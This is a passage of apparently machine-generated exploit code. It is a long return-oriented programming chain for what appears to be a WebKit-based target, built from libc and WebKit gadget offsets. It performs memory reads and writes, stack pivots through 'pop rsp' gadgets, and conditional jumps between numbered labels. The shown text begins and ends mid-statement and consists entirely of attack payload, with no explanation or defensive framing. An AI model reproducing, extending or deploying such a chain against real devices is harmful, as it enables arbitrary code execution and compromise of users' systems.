0]); // 0x0 set_gadgets([ libc_base+759608, //pop rax //L3319: ropchain+200072, //L3317 libc_base+144605 //pop rdi ]); //L3320: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+200048, //L3322 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+200064, //L3321 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+759608 //pop rax ]); //L3322: db([0, 0]); // 0x0 set_gadget(libc_base+782311,); //pop rsp //L3321: db([0, 0]); // 0x0 //L3317: set_gadgets([ libc_base+853989, //mov rax, rcx libc_base+764760 //pop rsi ]); db([4294967264, 4294967295]); // -0x20 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi 
//L3323: libc_base+764760, //pop rsi ropchain+200144, //L3324 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L3324: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3326: db([4294967280, 4294967295]); // -0x10 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+200264, //L3329 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+200248, //L3327 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3327: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3329: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+200408, //L3332 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+200376, //L3330 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+200392, //L3331 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3330: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3331: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3332: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+200496, //L3334 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+764760 //pop rsi ]); //L3333: db([1, 0]); // 0x1 set_gadget(libc_base+759608,); //pop rax //L3334: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+200552, //L3335 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L3335: db([0, 0]); // 0x0 
set_gadget(libc_base+764760,); //pop rsi //L3337: db([4294967280, 4294967295]); // -0x10 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+20307877, //mov [rax], rcx libc_base+764760, //pop rsi ropchain+200632, //L3339 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3339: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+782311, //pop rsp ropchain+196704, //L3233 //L3271: //L3217: //L3340: libc_base+764760, //pop rsi ropchain+200728, //L3341 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L3341: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3343: db([56, 0]); // 0x38 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+200848, //L3346 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+200832, //L3344 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3344: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3346: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+201040, //L3351 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+201056, //L3352 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+200992, //L3348 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+201024, //L3350 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L3348: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi 
//L3349: db([0, 0]); // 0x0 set_gadget(libc_base+763368,); //pop rcx //L3350: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L3351: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3352: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+201168, //L3353+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+201160, //L3353 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L3353: db([0, 0]); // 0x0 set_gadgets([ ropchain+201184, //L3353+24 ropchain+205424, //L3347 libc_base+764760, //pop rsi ropchain+201224, //L3354 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L3354: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3356: db([40, 0]); // 0x28 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+201344, //L3359 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+201328, //L3357 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3357: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3359: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+201488, //L3362 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+201456, //L3360 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+201472, //L3361 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3360: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3361: db([0, 
0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3362: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+201568, //L3363 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L3363: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3365: db([32, 0]); // 0x20 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+201688, //L3368 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+201672, //L3366 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3366: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3368: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+201832, //L3371 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+201800, //L3369 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+201816, //L3370 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3369: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3370: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3371: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+201920, //L3373 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+764760 //pop rsi ]); //L3372: db([1, 0]); // 0x1 set_gadget(libc_base+759608,); //pop rax //L3373: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi 
libc_base+764760, //pop rsi ropchain+201976, //L3374 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L3374: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3376: db([32, 0]); // 0x20 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+20307877, //mov [rax], rcx libc_base+764760, //pop rsi ropchain+202056, //L3378 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3378: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+202168, //L3379 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L3379: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3381: db([24, 0]); // 0x18 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+202288, //L3384 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+202272, //L3382 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3382: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3384: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+202432, //L3387 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+202400, //L3385 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+202416, //L3386 webkit_base+660161, //mov [rsi], rax ; mov al, 
1 libc_base+763368 //pop rcx ]); //L3385: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3386: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3387: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+202512, //L3388 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L3388: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3390: db([48, 0]); // 0x30 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+202632, //L3393 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+202616, //L3391 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3391: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3393: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+202776, //L3396 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+202744, //L3394 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+202760, //L3395 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3394: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3395: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3396: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+202848, //L3398 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3398: db([0, 0]); // 0x0 
set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+202904, //L3399 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3399: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+202984, //L3401 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L3401: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3403: db([56, 0]); // 0x38 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+203104, //L3406 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+203088, //L3404 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3404: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3406: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+203264, //L3410 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+203216, //L3407 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+203232, //L3408 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3407: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3408: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3409: db([4294967295, 4294967295]); // -0x1 set_gadget(libc_base+759608,); //pop rax //L3410: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+203320, //L3411 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 
libc_base+763368 //pop rcx ]); //L3411: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3413: db([56, 0]); // 0x38 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+20307877, //mov [rax], rcx libc_base+853989, //mov rax, rcx libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+755660, //add rax, rcx libc_base+764760, //pop rsi ropchain+203448, //L3415 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3415: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+203504, //L3416 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3416: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+203648, //L3419 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+203664, //L3420 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+203632, //L3418 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3418: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3419: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3420: db([0, 0]); // 0x0 set_gadgets([ libc_base+223440, //mov al, [rdi] libc_base+764760, //pop rsi ropchain+203824, //L3424 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+203792, //L3422 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+203808, //L3423 webkit_base+660161, //mov 
[rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3421: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L3422: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3423: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3424: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+203880, //L3426 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L3426: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+204008, //L3428 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+204024, //L3429 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+203992, //L3427 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3427: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L3428: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3429: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+204184, //L3433 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+204152, //L3431 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+204168, //L3432 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3430: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L3431: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3432: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3433: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+204240, //L3435 webkit_base+660161, //mov [rsi], rax ; mov 
al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L3435: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+204368, //L3437 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+204384, //L3438 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+204352, //L3436 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3436: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L3437: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3438: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+204544, //L3442 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+204512, //L3440 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+204528, //L3441 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3439: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L3440: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3441: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3442: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+204600, //L3444 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L3444: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+204728, //L3446 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+204744, //L3447 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 
libc_base+764760, //pop rsi ropchain+204712, //L3445 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3445: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L3446: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3447: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+204824, //L3448 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+204840, //L3449 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L3448: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3449: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+204936, //L3451 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+204920, //L3450 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L3450: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3451: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+205016, //L3452 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L3452: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3454: db([16, 0]); // 0x10 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+205136, //L3457 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+205120, //L3455 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3455: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3457: db([0, 
0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+205216, //L3459 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+205248, //L3461 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3459: db([0, 0]); // 0x0 set_gadgets([ libc_base+759608, //pop rax //L3460: ropchain+205376, //L3458 libc_base+144605 //pop rdi ]); //L3461: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+205352, //L3463 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+205368, //L3462 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+759608 //pop rax ]); //L3463: db([0, 0]); // 0x0 set_gadget(libc_base+782311,); //pop rsp //L3462: db([0, 0]); // 0x0 //L3458: set_gadgets([ libc_base+853989, //mov rax, rcx libc_base+764760 //pop rsi ]); db([4294967264, 4294967295]); // -0x20 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+782311, //pop rsp ropchain+205440, //L3464 //L3347: libc_base+782311, //pop rsp ropchain+205456, //L3465 //L3464: libc_base+782311, //pop rsp ropchain+200688, //L3340 //L3465: libc_base+764760, //pop rsi ropchain+205496, //L3466 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L3466: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3468: db([72, 0]); // 0x48 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+205616, //L3471 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+205600, //L3469 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); 
//L3469: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3471: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+205792, //L3474 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+205808, //L3475 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+205760, //L3472 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+205776, //L3473 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3472: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L3473: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3474: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3475: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+205904, //L3477 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+205888, //L3476 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L3476: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3477: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L3478: db([1, 0]); // 0x1 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L3479: db([1, 0]); // 0x1 set_gadget(libc_base+763368,); //pop rcx //L3480: db([1, 0]); // 0x1 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, 
